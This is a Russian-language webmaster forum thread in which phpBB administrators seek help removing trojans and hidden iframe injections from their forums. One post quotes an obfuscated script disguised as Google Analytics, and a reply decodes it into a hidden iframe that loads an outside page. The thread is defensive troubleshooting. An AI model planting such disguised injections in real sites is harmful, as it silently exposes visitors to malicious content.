Как убить Трояна?

[AdmninsCluba]

обнаружено: троянская программа Trojan-Downloader.VBS.Small.dh

Почистил файл - index.php. Не помогло. Что надо сделать чтобы найти и убить скрипт?

Спасибо.

ОТВЕТ:
- проверяемся на вирусы
- меняем ВСЕ пароли и не храним их в FTP-клиенте.
- чистим файлы Index.* или заливаем из бэкапа.

http://virusinfo.info/pravila.html

[Fray98rus]

под учетной записью "старого" админа уже нельзя будет?

Обновите пароль старого админа и все, только после удаления трояна.

[xkaa]

Fray98rus, спасибо, но тут сложнее. Я описал ситуацию здесь: http://www.phpbbguru.net/community/topi ... ml#p233212

Палыч, уточните, пожалуйста, по моим вопросам и что-нибудь про ссылку...

Спасибо.

[Палыч]

но тут сложнее.

Ничего сложного. Вам требуется получить доступ к админке. Вот и получите.
Можете через админку изменить всё, что вам требуется.
Fray98rus вам правильно подсказывает дальнейшие действия.
Ссылку поправил.

[Sleepy]

Доброе время суток!
Мой форум был заражен вирусом, об этом сообщили пользователи, у которых антивирусник аваста, тут же сменила пароль, проверила комп на вирусы, удалила их, вручную проверила основные файлы, которые могли быть заражены, инфреймов не нашла, скриптов левых тоже, тогда сделала полный бэкап файлов форума. Ничего не изменилось, пользователи с авастой пишут о вирусах, а другие жалуются на незначительные глюки. Проверяла форум различными вебсканерами, они вирусов не видят, у самой меня все нормально. Что еще можно сделать? Честно говоря, думала, что бэкап должен помочь был точно Оо
Буду оч благдарна. если поможете советом)

П.С. www.forum.kaulitztwins.ru

[Палыч]

Sleepy
Посоветовать пишушим пользователям очистить кеш на своих браузерах.

[Sleepy]

Один из пишущих о вирусах - модератор. Она удаляла кэш, загружала форум с разных браузеров (после удаления кэша), проверяла комп на вирусы, перезагружала и т.д. Аваста пишет: обнаружен червь HTML:iFrame-inf.

[DK7]

кроме файлов, iFrame может в описаниях к форуму к примеру быть. Сделайте беккап бд, и в нём поищите <iframe src=

[Rayden]

тут же сменила пароль, проверила комп на вирусы, удалила их, вручную проверила основные файлы, которые могли быть заражены, инфреймов не нашла, скриптов левых тоже, тогда сделала полный бэкап файлов форума.

Вообще-то надо делать наоборот - сначала чистить комп, а уж потом на чистом менять пароль.

[Sleepy]

Оказалось в phpbb_config, всем спасибо))

[SDSFox]

Вот опять какая-то хрень прицепилась во всех Index файлах:

Код: Выделить всё

<!-- http://www.google-analytics.com --><script>var source ="=jgsbnf!tsd>#iuuq;00tfpusbgg/cj{0hpphmf0jgsbnf/qiq#!xjeui>2!ifjhiu>2!tuzmf>#wjtjcjmjuz;!ijeefo#?=0jgsbnf?"; var result = ""; 
for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1); 
document.write(result); </script><!--/ http://www.google-analytics.com -->

кто-нибудь понимает вредоносность данного скрипта?

[Alek$]

кто-нибудь понимает вредоносность данного скрипта?

Оно же, только раскодированное:

Код: Выделить всё

<iframe src="http://seotraff.biz/google/iframe.php" width=1 height=1 style="visibility: hidden"></iframe>

[Garret_Dark]

Сегодня обнаружил у себя на форуме во всех файлах index.* такого зверя HEUR:Trojan.Script.Iframer заметил только изза того что индексные страницы перестали запускаться и выдавало ошибку (в конце файла добавлялся код трояна)
Как он мог туда попасть я ума не приложу, к FTP имею доступ только я, но буквально вчера проверял свой комп на вирусы полным сканированием Касперского 8 (именно им потом обнаружил заразу в скачанном index.php), на бэкапе файлов форума недельной давности вирусов нет, можно грешить на хостера? Я вобще FTP клиентами не пользуюсь, все через вебинтерфейс Cpanel оперой, пароль только в голове, на компе никогда не сохранял...

[Rayden]

Ну и чего ты сюда пишешь? Чтоб потрындить как бабульки на лавочке и догадки высказывать?
Обратись к хостеру, пусть смотрят логи, кто и когда изменял файлы. Как это происходило, по фтп или еще как.

[Srogov]

Если антивирусы не видят, придется вручную посмотреть iframe.

[Rayden]

Srogov
Думаешь он месяц ждал твоего совета?
Причем совета откровенно тупого.

буквально вчера проверял свой комп на вирусы полным сканированием Касперского 8

Если антивирусы не видят, придется вручную посмотреть iframe.

Предлагаешь полное сканирование компа вручную, чтоб искать фреймы??? В экзешниках тоже будешь вручную искать?